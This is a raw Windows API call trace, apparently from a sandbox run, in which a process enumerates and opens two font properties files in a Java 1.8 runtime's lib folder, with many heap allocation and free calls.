[0097.687] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.687] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x300bac87, dwReserved1=0xeb429361, cFileName="psfont.properties.ja", cAlternateFileName="PSFONT~1.JA")) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0097.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0097.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0097.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0097.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0097.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.688] AreFileApisANSI () returned 1 [0097.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja", lpUsedDefaultChar=0x0) returned 60 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.688] AreFileApisANSI () returned 1 [0097.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0097.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 60 [0097.688] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.689] GetFileType (hFile=0x360) returned 0x1 [0097.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0097.689] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.689] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.690] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.690] CloseHandle (hObject=0x360) returned 1 [0097.690] AreFileApisANSI () returned 1 [0097.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0097.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 60 [0097.690] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.690] GetFileType (hFile=0x360) returned 0x1 [0097.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.690] CloseHandle (hObject=0x360) returned 1 [0097.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.691] AreFileApisANSI () returned 1 [0097.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0097.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 60 [0097.691] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaec)) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.692] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2899, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="psfontj2d.properties", cAlternateFileName="PSFONT~1.PRO")) returned 1 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0097.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0097.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0097.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.693] AreFileApisANSI () returned 1 [0097.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties", lpUsedDefaultChar=0x0) returned 60 [0097.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.693] AreFileApisANSI () returned 1 [0097.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0097.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 60 [0097.693] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.693] GetFileType (hFile=0x360) returned 0x1 [0097.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.694] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.694] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.694] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.694] CloseHandle (hObject=0x360) returned 1 [0097.694] AreFileApisANSI () returned 1 [0097.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0097.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 60 [0097.694] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.694] GetFileType (hFile=0x360) returned 0x1 [0097.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.695] CloseHandle (hObject=0x360) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.696] AreFileApisANSI () returned 1 [0097.696] 